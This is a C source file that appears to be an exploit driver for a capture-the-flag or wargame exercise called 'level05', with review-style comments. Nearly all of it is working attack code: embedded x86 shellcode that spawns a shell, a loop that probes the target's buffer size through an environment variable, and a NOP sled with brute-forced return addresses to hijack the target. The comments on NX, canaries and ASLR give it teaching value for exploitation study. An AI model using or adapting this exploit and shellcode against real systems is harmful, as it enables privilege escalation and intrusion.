- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
/* 0x90 is the one-byte x86 `nop`; main() uses it as filler for the
 * payload buffer (see the "fill with nops" memset there). */
#define NOP 0x90
/* Presumably the size of the target's buffer — the probe loop in main()
 * starts its search here and the payload is placed relative to it.
 * TODO confirm against the level05 source. */
const int targetsz = 128;
/* Byte length of `shellcode` below: three 8-byte segments plus one. */
const int shcsz = 3*8+1;
/* 25 bytes of 32-bit x86 machine code supplied with the exercise. Its
 * length must stay equal to shcsz; nothing in this file checks that
 * (a _Static_assert on sizeof shellcode - 1 would). */
const char shellcode[] =
"\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x89\xe2\x53\x89\xe1\xb0\x0b\xcd"
"\x80";
/* Returns the current stack pointer on 32-bit x86.
 * The value is left in %eax and the function has no C `return`: this
 * relies on %eax being the cdecl return register and is undefined
 * behaviour per the standard — an optimising compiler may discard the
 * asm or the value. 32-bit only; on x86-64 the `movl` presumably yields
 * just the low half of %rsp (TODO confirm). With ASLR enabled the value
 * also differs per process, which is the mitigation this idiom predates. */
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}
/*
 * Driver for the level05 exercise: a textbook stack smash delivered
 * through an environment variable. Phase 1 probes for the crash
 * threshold, phase 2 sweeps candidate return addresses. Everything it
 * depends on — an executable stack and a %esp that is predictable
 * across processes — is what non-executable stacks, stack canaries and
 * ASLR remove, so on a hardened host the second loop is expected to
 * run to exhaustion.
 * Returns 0 once the child reports status 0, -1 on allocation failure,
 * and falls off the end (implicit 0 in C99) if every offset is tried.
 * argc/argv are unused.
 */
int main(int argc, char **argv) {
    /* Stack pointer of this process, used as the anchor for the address
     * guesses written into the payload (assumes the child's stack lands
     * nearby — TODO confirm). */
    unsigned long int sp = get_sp();
    int az;      /* candidate payload size in bytes */
    char *ab;    /* payload buffer, handed to the target via $QQQ */
    int rc;      /* raw status returned by system() */
    /* Phase 1: grow a string of 'A's until the target crashes. */
    for (az=targetsz; az<512 ;++az) {
        ab = calloc(az, sizeof(char));
        if (ab == NULL) { fprintf(stderr, "!!!\n"); return -1; }
        memset(ab, 'A', az);
        ab[az-1] = '\0';
        setenv("QQQ", ab, 1);
        /* $QQQ is unquoted here (word splitting is harmless for a run
         * of 'A's); the second phase quotes it. */
        rc = system("/levels/level05 $QQQ");
        free(ab);
        /* NOTE(review): system() returns a waitpid()-style status, so a
         * bare 139 (128+SIGSEGV) only matches if the shell exits with
         * that code and the status comes back unshifted. Decoding with
         * WIFEXITED/WEXITSTATUS/WIFSIGNALED from <sys/wait.h> is the
         * portable form. */
        if (rc == 139) {
            printf("buffer size: %d, return code: %d\n", az, rc);
            break;
        }
    }
    /* Round up to a multiple of 4, plus one byte for the terminating
     * NUL. If the probe loop found no crash, az is 512 here and the
     * code carries on regardless. */
    az = ((az+3) & ~3) + 1;
    printf("buffer size: rounded to %d\n", az);
    /* NOTE(review): this calloc is not checked for NULL, unlike the one
     * above; the memset below would dereference a null pointer on
     * failure. The buffer is never freed (process exit reclaims it). */
    ab = calloc(az, sizeof(char));
    /* Word-sized view of the same buffer so addresses can be written
     * whole. calloc memory is suitably aligned, but aliasing a char
     * buffer through an unsigned long pointer is a strict-aliasing
     * hazard in principle. */
    unsigned long int *lab = (unsigned long int*)ab;
    /* Number of whole words in the buffer (size_t narrowed to int). */
    int laz = az / sizeof(unsigned long int);
    // fill with nops
    memset(ab, NOP, az-1);
    // and then the shell code
    memcpy(ab+targetsz-shcsz, shellcode, shcsz);
    /* Phase 2: overwrite every word past targetsz with one guessed
     * address, stepping 16 bytes below sp per attempt, and rerun the
     * target each time. */
    for (int offset=0; offset<1024; offset+=16) {
        for (int i=targetsz/sizeof(unsigned long int); i<laz; ++i) {
            lab[i] = sp-offset;
        }
        // lastly a null
        ab[az-1] = '\0';
        setenv("QQQ", ab, 1);
        /* %lx matches unsigned long here. */
        printf("offset: %d, address:%lx\n", offset, lab[laz-1]);
        //rc = system("gdb /levels/level05 -ex \"set arg '$QQQ'\"");
        rc = system("/levels/level05 \"$QQQ\"");
        printf("rc: %d\n", rc);
        /* A zero status is taken as success; see the note above about
         * decoding system()'s return value. */
        if (rc == 0) {
            return 0;
        }
    }
}